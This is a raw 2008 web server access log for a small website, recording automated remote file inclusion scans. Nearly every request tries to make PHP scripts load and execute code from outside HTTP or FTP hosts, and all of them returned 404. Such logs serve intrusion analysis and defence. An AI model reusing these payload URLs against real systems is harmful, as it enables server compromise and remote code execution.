82.194.86.237 - - [13/Jul/2008:17:54:06 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:54:19 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:54:19 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.6.8.94 - - [13/Jul/2008:17:55:10 -0700] "GET /logs/access_071203.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:56:23 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:58:11 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:58:12 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:58:26 -0700] "GET /logs/access_080211.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:58:26 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:58:26 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
62.212.90.214 - - [13/Jul/2008:17:58:51 -0700] "GET /logs/access.log//main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.212.90.214 - - [13/Jul/2008:17:58:51 -0700] "GET //main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.212.90.214 - - [13/Jul/2008:17:58:52 -0700] "GET /logs//main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:59:06 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:59:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:59:07 -0700] "GET /logs/access.log//main.php?sayfa=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:59:07 -0700] "GET //main.php?sayfa=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:59:07 -0700] "GET /logs//main.php?sayfa=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:15 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:16 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:26 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:26 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:26 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:26 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:26 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:26 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:28 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:29 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:29 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:29 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:29 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:30 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:30 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:30 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:34 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:35 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:35 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:59:35 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
205.234.252.183 - - [13/Jul/2008:17:59:46 -0700] "GET /logs/access_080211.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
205.234.252.183 - - [13/Jul/2008:17:59:46 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
205.234.252.183 - - [13/Jul/2008:17:59:46 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
193.178.228.12 - - [13/Jul/2008:17:59:55 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [13/Jul/2008:17:59:55 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.178.228.12 - - [13/Jul/2008:17:59:56 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.246.8.237 - - [13/Jul/2008:18:00:21 -0700] "GET //main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
216.246.8.237 - - [13/Jul/2008:18:00:22 -0700] "GET /logs//main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:00:53 -0700] "GET /logs/access_080211.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:00:53 -0700] "GET /logs/access_080211.log/index.php?incl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:00:53 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:18:00:53 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
87.106.18.76 - - [13/Jul/2008:18:01:53 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.18.76 - - [13/Jul/2008:18:01:59 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:41 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:42 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:42 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:57 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:57 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:58 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:58 -0700] "GET /logs/access.log/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:59 -0700] "GET /errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:59 -0700] "GET /logs/access.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:59 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:03:59 -0700] "GET /errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:04:00 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:18:04:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:18:04:47 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:18:04:48 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:18:04:49 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:08 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:08 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:09 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:24 -0700] "GET /logs/access.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:25 -0700] "GET /errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:25 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:25 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:26 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:05:26 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:06:15 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:06:15 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:06:16 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:06:35 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:06:36 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:06:36 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
83.103.23.40 - - [13/Jul/2008:18:06:41 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.103.23.40 - - [13/Jul/2008:18:06:41 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.103.23.40 - - [13/Jul/2008:18:06:42 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.103.23.40 - - [13/Jul/2008:18:06:42 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:18:06:48 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:18:06:49 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:07:22 -0700] "GET /logs/access_080211.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:07:22 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:07:23 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:07:56 -0700] "GET /logs/access.log/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:07:56 -0700] "GET /avatar.php?page=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:07:57 -0700] "GET /logs/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:08:05 -0700] "GET /logs/access_080211.log/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:08:05 -0700] "GET /avatar.php?page=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:08:05 -0700] "GET /logs/avatar.php?page=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:18:08:10 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:18:08:10 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:08:13 -0700] "GET /logs/access_080211.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:08:14 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:08:14 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:08:21 -0700] "GET /logs/access_080211.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:08:22 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:18:08:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:09:51 -0700] "GET /logs/access_080211.log/index.php?incl=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:09:51 -0700] "GET /index.php?incl=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
66.98.250.45 - - [13/Jul/2008:18:09:51 -0700] "GET /logs/index.php?incl=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
216.246.7.92 - - [13/Jul/2008:18:10:13 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.246.7.92 - - [13/Jul/2008:18:10:13 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.246.7.92 - - [13/Jul/2008:18:10:13 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
205.234.234.3 - - [13/Jul/2008:18:10:29 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
205.234.234.3 - - [13/Jul/2008:18:10:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
205.234.234.3 - - [13/Jul/2008:18:10:30 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
207.58.170.49 - - [13/Jul/2008:18:11:20 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
207.58.170.49 - - [13/Jul/2008:18:11:20 -0700] "GET /logs/access_080211.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
